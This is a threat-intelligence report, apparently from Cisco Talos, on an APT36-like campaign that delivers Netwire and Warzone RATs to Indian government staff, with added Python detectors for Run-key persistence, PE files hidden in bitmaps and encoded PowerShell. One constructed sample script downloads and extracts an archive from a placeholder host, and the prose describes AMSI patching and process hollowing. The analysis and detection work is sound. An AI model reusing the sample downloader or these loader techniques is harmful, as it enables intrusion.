- Cisco Talos is tracking a campaign targeting government personnel in India using themes and tactics similar to APT36 (aka Mythic Leopard and Transparent Tribe).
- This campaign distributes malicious documents and archives to deliver the Netwire and Warzone (AveMaria) RATs.
- The lures used in this campaign are predominantly themed around operational documents and guides, such as those pertaining to the “Kavach” (Hindi for “armor”) two-factor authentication (2FA) application operated by India’s National Informatics Centre (NIC).
- This campaign utilizes compromised websites and fake domains to host malicious payloads, another tactic similar to Transparent Tribe.
Cisco Talos recently discovered a malicious campaign targeting government employees and military personnel in the Indian sub-continent with two commercial and commodity RAT families known as NetwireRAT (aka NetwireRC) and WarzoneRAT (aka Ave Maria). The attackers delivered a variety of lures to their targets, predominantly posing as guides related to Indian governmental infrastructure and operations such as Kavach and I.T.-related guides in the form of malicious Microsoft Office documents (maldocs) and archives (RARs, ZIPs) containing loaders for the RATs.
Apart from artifacts involved in the infection chains, we’ve also discovered the use of server-side scripts to carry out operational tasks such as sending out malicious emails and maintaining presence on compromised sites via web shells. This provides additional insight into the attacker’s operational TTPs.
How did it work?
This campaign uses a few distinct, yet simple, infection chains. Most infections use a maldoc that downloads and instruments a loader. The loader is responsible for downloading or decrypting (if embedded) the final RAT payload and deploying it on the infected endpoint. In some cases, we’ve observed the use of malicious archives containing a combination of maldocs, loaders and decoy images. The RAT payloads are relatively unmodified, with the command and control (C2) IPs and domains being the most pivotal configuration information.
This campaign illustrates another instance of a highly motivated threat actor using a set of commercial and commodity RAT families to infect their victims. These RATs are packed with many features out-of-the-box to achieve comprehensive control over the infected systems. It is also highly likely that these malware families establish footholds into the victim’s networks to deploy additional plugins and modules.
The earliest instance of this campaign was observed in December 2020 utilizing malicious Microsoft Office documents (maldocs). These maldocs contain malicious VBA macros that download and execute the next stage of the infection — the malware loader.
The maldocs’ content ranges from security advisories, to meeting schedules, to software installation notes. These maldocs contain malicious macros that download and execute the next stage payload on the victim’s endpoint. The final payload is usually a RAT that can perform a multitude of malicious operations on the infected endpoint.
The maldocs pose as documents related to either meeting schedules pertinent to the victims, or as technical guides related to the Government of India’s IT infrastructure. It is likely that these files are either delivered as attachments or links in spear-phishing emails where the verbiage is meant to social engineer the victims into opening the maldoc attachments or downloading them from an attacker-controlled link.
Some file names used are:
- Online meeting schedule for OPS.doc
Interestingly, we’ve observed the use of Kavach-themed maldocs and binaries being used in recent SideCopy attacks.
Malicious macro in maldoc downloading and executing the next stage payload.
Stage 2 — Loaders
The next-stage payload is usually a loader binary that instruments the final malware payload. These loaders use one of the following techniques to instrument the final malware payload on the endpoint:
- Download payload from remote location and activate using process hollowing into itself or a target process.
- Decode embedded payload and activate using process hollowing.
Depending on the variants, the loaders may also perform the following peripheral activities:
- Disable AMSI scanning by patching the first six bytes of the “AmsiScanBuffer” API.
- Set up persistence via the registry for the next-stage malware payload dropped to disk, using the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key.
Throughout March and April 2021, the attackers utilized downloaders to download and execute the RAT payloads from remote locations. The earliest versions of this loader used RunPE DLLs to inject the malware payloads into a specified target process via hollowing.
.NET loader utilizing RunPE.dll to inject AveMaria RAT payload into InstallUtil.exe.
In May 2021, the attackers used the next iteration of their C#-based downloader that reaches out to a decoy URL and only proceeds with execution if the communication process fails.
Downloader reaching out to a decoy URL and executing actual functionality in the catch code block.
This downloader then proceeds to patch the “AmsiScanBuffer” API, establishes persistence for the next stage payload and invokes it at the end. The payload in the next stage consists of legitimate .NET-based applications trojanized with the ability to decrypt and deploy the NetwireRAT malware.
AMSI bypass, persistence and invocation by the loader.
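The Run-key persistence described above is cheap to audit from the defender's side. The following added example (written for this page, not Talos tooling or the loader's code) parses an `HKCU\...\Run` export in `reg export` (.reg) syntax and flags entries that look like loader-style persistence: executables in user-writable directories, system binary names outside the Windows directory, and scripting hosts launched at logon. The .reg text, the paths and the entry names are constructed.

```python
"""Audit HKCU\\...\\Run entries exported with `reg export` for loader-style persistence.
Added example, not Talos tooling; the .reg export below is constructed."""
import re
from pathlib import PureWindowsPath

# Constructed export in `reg export` (Windows Registry Editor 5.00) syntax.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"Updater"="C:\\Users\\alice\\AppData\\Roaming\\Updater\\svchost.exe"
"Helper"="wscript.exe //B \"C:\\Users\\alice\\AppData\\Local\\Temp\\helper.vbs\""
'''

# Path fragments a standard user can write to (hypothetical list, extend per environment).
USER_WRITABLE = ("appdata\\roaming", "appdata\\local\\temp", "\\temp\\", "\\downloads\\", "\\public\\", "programdata")
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"}

# One .reg value line: "name"="value", with \" and \\ escapes inside.
_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    """Undo .reg escaping: \\\\ -> \\ and \\" -> " in a single pass."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(reg_text: str):
    """Return (name, command) pairs from a .reg export of the Run key."""
    entries = []
    for raw in reg_text.splitlines():
        m = _LINE.match(raw.strip())
        if m:
            entries.append((_unescape(m.group(1)), _unescape(m.group(2))))
    return entries


def command_executable(command: str) -> str:
    """Pull the program path out of a Run value (quoted path, or first .exe token)."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    i = cmd.lower().find(".exe")
    return cmd[:i + 4] if i >= 0 else cmd.split()[0]


def assess_entry(name: str, command: str):
    """Return the reasons an entry looks like loader-style persistence (empty if none)."""
    reasons = []
    exe = command_executable(command)
    exe_low = exe.lower()
    base = PureWindowsPath(exe).name.lower()
    if any(marker in exe_low for marker in USER_WRITABLE):
        reasons.append("executable lives in a user-writable directory")
    if base in SYSTEM_NAMES and "\\windows\\" not in exe_low:
        reasons.append(f"system binary name {base} outside the Windows directory")
    if base in SCRIPT_HOSTS:
        reasons.append(f"scripting host {base} used for autostart")
        if any(marker in command.lower() for marker in USER_WRITABLE):
            reasons.append("script argument in a user-writable directory")
    return reasons


def audit(reg_text: str):
    """Map entry name -> reasons, only for entries that trip at least one heuristic."""
    findings = {}
    for name, cmd in parse_run_entries(reg_text):
        reasons = assess_entry(name, cmd)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_REG).items():
        print(name, "->", "; ".join(reasons))
```

The heuristics deliberately stay path-based: a loader that drops its payload next to itself under AppData and registers it under Run trips the first rule regardless of what the file is named, while the system-name rule catches the common trick of borrowing a Windows binary name for a file that lives elsewhere.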
Toward the beginning of June 2021, the attackers started experimenting with the use of Pastebin as a payload-hosting platform. The downloader reached out to a Pastebin URL via cURL to download and inject the payload into its own running process.
Evolution of the downloaders:
Loaders with embedded payloads
The attackers modified open-source projects with code to load trojanized .NET-based binaries as loaders for the RATs dating as far back as December 2020. One of the droppers we analyzed is based on the Pangantucan Community High School library management system application.
It is likely that the loader is based on a crypter available to the attackers since we’ve observed other crimeware families such as Formbook use similar loaders to infect their targets.
The original application Initialization code for Form1.
The same function in the trojanized version calls the constructor of the added ISectionEntry class.
The loader modified the Login form with a call to a function that loads a DLL loader with the assembly name “SimpleUI.” The second-stage loader is extracted from the .NET resource with the name “Draw.”
The assembly extracted from the Draw resource is responsible for decoding and loading a Netwire injector module which is stored as the AuthorizationRule bitmap resource in the original trojanized loader.
AuthorizationRule blob parsed as a bitmap image (464,147 bytes long).
The injector deploys the NetwireRAT binary present in its .NET resources into a target process, such as vbc.exe.
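Storing an injector as a bitmap resource, as the AuthorizationRule blob above does, leaves two things a resource scan can check: whether the pixel area contains a PE image, and whether the declared image geometry can account for the bytes that follow the headers. The following added example (written for this page, not Talos or the sample's code) builds a constructed BMP with a stand-in PE blob inside it and applies both checks; `build_bmp` and `fake_pe` exist only to manufacture the test input.

```python
"""Detect executables hidden in bitmap (BMP) resources.
Added example, not Talos tooling; the BMP and the PE stand-in are constructed."""
import struct

BMP_HEADER_LEN = 14 + 40  # BITMAPFILEHEADER + BITMAPINFOHEADER


def build_bmp(payload: bytes, width: int = 1, height: int = 1) -> bytes:
    """Build a minimal 24-bpp BMP whose pixel area is `payload` (constructed test input)."""
    file_size = BMP_HEADER_LEN + len(payload)
    file_header = b"BM" + struct.pack("<IHHI", file_size, 0, 0, BMP_HEADER_LEN)
    # biSize, width, height, planes, bpp, compression, image size, x/y ppm, colors used/important
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                              len(payload), 2835, 2835, 0, 0)
    return file_header + info_header + payload


def fake_pe(size: int = 512) -> bytes:
    """Constructed stand-in for a PE image: DOS header whose e_lfanew points at 'PE\\0\\0'."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    body = bytearray(size - 64)
    body[0:4] = b"PE\0\0"
    return bytes(dos + body)


def find_embedded_pe(bmp: bytes):
    """Return file offsets inside the pixel data where an MZ header points at a valid PE signature."""
    if len(bmp) < 14 or bmp[:2] != b"BM":
        return []
    pixel_offset = struct.unpack_from("<I", bmp, 10)[0]
    pixels = bmp[pixel_offset:]
    hits = []
    pos = pixels.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(pixels):
            e_lfanew = struct.unpack_from("<I", pixels, pos + 0x3C)[0]
            sig = pos + e_lfanew
            # Sane e_lfanew range and a real "PE\0\0" signature, not just a stray "MZ".
            if 0x40 <= e_lfanew < 0x1000 and pixels[sig:sig + 4] == b"PE\0\0":
                hits.append(pixel_offset + pos)
        pos = pixels.find(b"MZ", pos + 1)
    return hits


def pixel_size_mismatch(bmp: bytes) -> bool:
    """True when the declared width/height/bpp cannot account for the bytes after the headers."""
    pixel_offset = struct.unpack_from("<I", bmp, 10)[0]
    width, height = struct.unpack_from("<ii", bmp, 18)
    bpp = struct.unpack_from("<H", bmp, 28)[0]
    row_bytes = ((width * bpp + 31) // 32) * 4  # rows are padded to 4-byte multiples
    expected = row_bytes * abs(height)
    return len(bmp) - pixel_offset > expected


if __name__ == "__main__":
    suspicious = build_bmp(b"\x00" * 100 + fake_pe() + b"\x00" * 10)
    print("embedded PE at:", find_embedded_pe(suspicious))
    print("size mismatch:", pixel_size_mismatch(suspicious))
```

The signature check only fires when the blob is a plain PE; a loader that XORs or compresses the payload before storing it defeats it, which is why the geometry check matters: a 1x1 "image" carrying hundreds of kilobytes is anomalous whatever the bytes look like.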
Stage 3 — Final payloads
The Netwire and AveMaria RAT families are eventually downloaded and executed on the victim machine. In some cases, we’ve also discovered the deployment of custom .NET-based file enumerator modules that generate and exfiltrate file path listings of specific file extensions on the infected systems.
Maldoc infection chain variation
In one instance, the attackers used a different variation of the infection chain that starts with a malicious document delivered to the victim. The macro in the maldoc downloads and executes a VBScript (VBS) instead of directly downloading the malware payload.
The VBS contains many junk comments interlaced with the actual malicious code. The malicious code will execute an encoded PowerShell command to download the next payload.
The PowerShell downloads a malicious archive and an unzip utility such as 7-Zip from a remote location. This utility unzips and runs the malware payload from the archive file. An example of the command used to unzip the archive is:
7za.exe x -y -aoa -bso0 -bse0 -bb0 -bd <archive_file_path>
Decoded PowerShell commands to activate the next-stage payload.
Infection chain diagram:
The final payload in this infection chain is a loader for AveMariaRAT.
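The VBS-to-PowerShell-to-7-Zip chain above leaves a recognizable trail in process command lines: an `-EncodedCommand` blob that decodes to a download call followed by a `7za.exe x ... -aoa` extraction out of a user-writable directory. The following added example (written for this page, not Talos tooling) decodes the UTF-16LE base64 form PowerShell expects and scores a command line on those indicators. The command lines and the script are constructed, and the URL is a placeholder.

```python
"""Decode PowerShell -EncodedCommand blobs and flag the download-then-extract pattern.
Added example, not Talos tooling; command lines below are constructed, URL is a placeholder."""
import base64
import re


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Accepts the abbreviations PowerShell accepts for the flag.
_ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


DOWNLOAD_API = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Start-BitsTransfer", re.I)
# 7z/7za extract ("x") with -aoa (overwrite all), as in the command quoted above.
SEVENZIP_EXTRACT = re.compile(r"""7za?(?:\.exe)?["']?\s+x\b.*?-aoa""", re.I)
USER_PATH = re.compile(r"\\(?:AppData|Temp|Public|ProgramData)\\|\$env:(?:APPDATA|TEMP|LOCALAPPDATA)", re.I)


def classify(cmdline: str):
    """Return the indicators triggered by one process command line, in a fixed order."""
    script = decode_encoded_command(cmdline)
    text = script if script is not None else cmdline
    hits = []
    if script is not None:
        hits.append("encoded-command")
    if DOWNLOAD_API.search(text):
        hits.append("download")
    if SEVENZIP_EXTRACT.search(text):
        hits.append("7zip-extract")
    if USER_PATH.search(text):
        hits.append("user-writable-path")
    return hits


# Constructed script mirroring the described behaviour (placeholder URL, nothing is fetched).
SAMPLE_SCRIPT = (
    "$d=\"$env:APPDATA\\x\"; "
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.zip', \"$d\\p.zip\"); "
    "& \"$d\\7za.exe\" x -y -aoa -bso0 -bse0 -bb0 -bd \"$d\\p.zip\""
)
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_ps(SAMPLE_SCRIPT),
    'powershell.exe -Command "Get-Process | Sort-Object CPU"',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify(line), "<-", line[:60])
```

Run over EDR or Sysmon process-creation records, the combination of all four indicators on one command line is a much stronger signal than any one of them; a lone `-enc` flag is common in legitimate administration, and a lone 7-Zip extraction is noise.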
In other infection attempts dating as far back as December 2020, the attackers hosted malicious ZIP archives containing malware payloads on compromised websites. It is likely that the URLs to these archive files were sent to victims to make them download and open the malware payload on their endpoints.
Three distinct archives containing the malicious payloads.
The malicious binaries from the archives found thus far load and instrument NetwireRAT.
Netwire is a highly versatile RAT consisting of multiple capabilities including:
- Steal credentials from browsers.
- Execute arbitrary commands.
- Gather system information.
- File management operations such as write, read, copy and delete files, etc.
- Enumerate and terminate processes.
Ave MariaRAT, also known as WarzoneRAT, is a commercial RAT available for purchase to malicious operators although there are cracked versions of Warzone available online.
WarzoneRAT capabilities (snip) as advertised by its authors.
Like Netwire, WarzoneRAT is also packed with a variety of functionalities including:
- Remote desktop.
- Webcam capture.
- Credential stealing from browsers and email clients.
- File management operations such as write, read, copy and delete files, etc.
- Execute arbitrary commands.
- Reverse shells.
- Enumerate and terminate processes.
Reverse shell functionality in WarzoneRAT.
Apart from the two RATs, we’ve also observed specialized reconnaissance malware being deployed on the victim’s endpoints instead of a RAT family. The attackers deployed a preliminary recon tool to enumerate specific folders looking for certain file extensions. The file listings/paths found are uploaded to an attacker-controlled C2 server.
The locations targeted were:
The file extensions searched for were:
.txt, .doc, .dot, .wbk, .docx, .docm, .dotx, .dotm, .docb, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx, .xltm, .xlsb, .xla, .xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .pdf
File enumerator malware module looking for specific file extensions.
Analyses and observations
An extremely common theme of maldocs and archives discovered in this campaign refers to the Government of India’s Kavach application. This is a two-factor authentication (2FA) application used by government employees to access their emails. This theme has been used recently by the SideCopy APT’s campaigns targeting Indian government personnel, as well. Some of the malicious artifacts using the Kavach theme in the current campaign are named:
Other file names indicating targeting of military and government personnel consist of:
- Pay and Allowance Details.xls
The attackers have relied on a combination of compromised websites and fake domains to carry out their operations — a tactic similar to that of the Transparent Tribe APT group. However, what stands out in this campaign is the focus on compromising quasi-military or government-related websites to host malicious payloads. This might have been done to appear legitimate to victims and analysts.
For example, the attackers compromised and maintained access to a quasi-defense-related website, dsoipalamvihar[.]co[.]in, belonging to the Defence Services Officers’ Institute (DSOI), using it to host NetwireRAT-related payloads since January 2021. In another instance, the attackers compromised the website of the Army Public Schools of India (apsdigicamp[.]com) to host a variety of malicious archives, again serving NetwireRAT.
On the other hand, the attackers used a fake domain govrn[.]xyz in July 2021 to host maldocs for their infection chains.
Malicious scripts and payloads hosted on a compromised website.
The compromised websites were used heavily to host artifacts ranging from maldocs to RATs. However, these websites hosted a few other malicious artifacts as well. These server-side scripts were used as:
- Web shells.
- CSRF PoC generator.
- File uploaders.
None of these scripts have been written from scratch or customized heavily by the attackers. This practice is in sync with their RAT deployments: neither the RAT payloads nor the infrastructure scripts have been modified beyond their configurations. The actual effort is instead put into social engineering and infecting victims.
Proliferation through emails
A variety of mailers have been used by the attackers to proliferate the maldocs, archives and download links:
- TeamCC ninjaMailer v220.127.116.11
- Leaf PHPMailer 2.7
- Leaf PHPMailer 2.8
These PHP-based scripts are capable of configuring SMTP options and generating spear-phishing emails that can be distributed to victims with malicious payloads or links.
TeamCC NinjaMailer hosted by the attackers on one of the compromised sites.
The attackers utilized two types of management scripts to administer the compromised websites. PHP and Perl-based web shells maintain browser-based access to the sites and perform administrative actions such as file management, process management and viewing file contents. The web shells used are:
- b374k 2.7
- Older b374k web shell
b374k web shell’s login page on the compromised site.
Older Perl-based b374k web shell hosted on a compromised site.
The attackers also deployed a file uploader utility (created by “Pakistan Haxors Crew”) to upload files to the sites without having to go through the web shells.
This campaign has been ongoing since the end of 2020 and continues to operate today. The attackers initially deployed Netwire and Warzone RATs on the infected endpoints. The use of these RATs benefits an adversary twofold — it makes attribution difficult and saves the effort to create bespoke implants. Beginning in July 2021, however, we observed the deployment of the file enumerators alongside the RATs. This indicates that the attackers are expanding their malware arsenal to target their victims: military and government personnel in India.
Infection tactics that include government-themed lures, deployment of commodity/commercial RATs and file enumerators, and the use of compromised and attacker-owned domains indicate a strong resemblance to SideCopy and Transparent Tribe.
Unlike many crimeware and APT attacks, this campaign uses relatively simple, straightforward infection chains. The attackers have not developed bespoke malware or infrastructure management scripts to carry out their attacks, but the use of prebaked artifacts doesn’t diminish the lethality of these attacks. In fact, ready-made artifacts such as commodity or cracked RATs and mailers allow the attackers to rapidly operationalize new campaigns while focusing on their key tactic: tricking victims into infecting themselves.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below:
RunPE loader DLL
C# based netwire loaders
Malicious server side scripts
Maldoc download locations
Loader/RAT download locations
File Enumerator C2s
Malicious archive download locations
RunPe download URLs
Malicious server-side script URLs